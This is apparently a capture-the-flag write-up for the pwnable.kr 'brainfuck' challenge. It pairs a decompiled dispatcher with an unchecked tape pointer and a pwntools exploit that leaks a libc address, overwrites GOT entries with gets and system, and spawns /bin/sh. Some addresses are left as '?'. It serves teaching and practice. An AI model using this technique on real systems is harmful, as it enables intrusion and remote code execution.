0x01 Overview
```c
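/*
 * Decompiler output for the challenge's command dispatcher, reformatted.
 * The page's markup had turned the quote characters into typographic quotes
 * and swallowed the `*` tokens (they read as emphasis markers); they are
 * restored here from the decompiler's own inline comments, which survived.
 *
 * `p` is a file-scope tape pointer (the original comment gives its initial
 * value, 0x0804A0A0). One brainfuck command `a1` is applied to it.
 * Returns whatever the decompiler left in eax: `a1 - 43` for a command that
 * matches no case, otherwise the value of the last expression in the case.
 *
 * Security note: `<` and `>` move `p` with no bounds check, so a command
 * sequence can walk the pointer off the tape, after which `.` reads and `,`
 * writes whatever memory `p` points at. Keeping `p` inside the tape in the
 * `<`/`>` handlers (reject moves that leave [tape, tape + TAPE_SIZE)) removes
 * that capability.
 */
int __cdecl do_brainfuck(char a1)
{
    int result; // eax
    _BYTE *v2;  // ebx

    result = a1 - 43; // value returned for an unrecognised command; p = 0804A0A0
    switch ( a1 )
    {
    case '+':
        result = p;
        ++*(_BYTE *)p; // (*p)++
        break;
    case ',':
        v2 = (_BYTE *)p;
        result = getchar();
        *v2 = result; // *(char *)p = getchar()
        break;
    case '-':
        result = p;
        --*(_BYTE *)p; // (*p)--
        break;
    case '.':
        result = putchar(*(char *)p); // print char *p
        break;
    case '<':
        result = --p; // p = p - 1, unchecked
        break;
    case '>':
        result = ++p; // p = p + 1, unchecked
        break;
    case '[':
        result = puts("[ and ] not supported.");
        break;
    default:
        return result;
    }
    return result;
}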
```
0x02 exp
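"""
Exploit script from the writeup, reformatted.

The page had collapsed each statement onto the line of the comment that
precedes it, so several assignments were swallowed by comments; here each
statement sits on its own line and the comments are translated.

The script relies on one defect visible in the decompiled `do_brainfuck`
above: the `<` and `>` handlers move the tape pointer without any bounds
check. That bounds check is the fix. The GOT addresses and libc offsets the
author left as `?` are not given on this page and are kept as written.
"""
from pwn import *

# initial value of the tape pointer
b = 0x804A0A0

# putchar GOT: read to leak a libc address
putchar_got = ?
# memset GOT: overwritten with the libc address of gets  -> gets(s)
memset_got = ?
# fgets GOT: overwritten with the libc address of system -> system(s)
fgets_got = ?

# libc putchar addr ?  libc system addr ?  (offsets relative to putchar; left unfilled)
system_addr_to_putchar = ? - ?
gets_addr_to_putchar = ? - ?

# start address
start = 0x080484E0

# 0x01 open the connection
brainfuck = remote("pwnable.kr", 9001)
brainfuck.recvuntil(b']\n')

# 0x02 build the payload
# the leading '.' is sent first because of lazy binding
payload = b'.' + \
    b'<'*(b-putchar_got) + b'.>'*4 + \
    b'<'*4 + b',>'*4 + b'<'*4 + \
    b'<'*(putchar_got-memset_got) + b',>'*4 + b'<'*4 + \
    b'<'*(memset_got-fgets_got) + b',>'*4 + b'<'*4 + b'.'

# 0x03 read the libc leak
brainfuck.sendline(payload)
what = brainfuck.recv(1)
print("what?: ", what)
base = brainfuck.recv(4)
putchar_addr = int.from_bytes(base, "little")
print("putchar got: ", base, " ", hex(putchar_addr))

# 0x04 replace putchar with _start
brainfuck.send(start.to_bytes(4, 'little'))

# 0x05 replace memset with gets, fgets with system
gets_addr = putchar_addr + gets_addr_to_putchar
print("gets got: ", hex(gets_addr))
brainfuck.send(gets_addr.to_bytes(4, 'little'))
system_addr = putchar_addr + system_addr_to_putchar
print("system got: ", hex(system_addr))
brainfuck.send(system_addr.to_bytes(4, 'little'))

# 0x06 send the string that gets() reads
brainfuck.send(b'/bin/sh\x00')

# 0x07 get a shell
brainfuck.interactive()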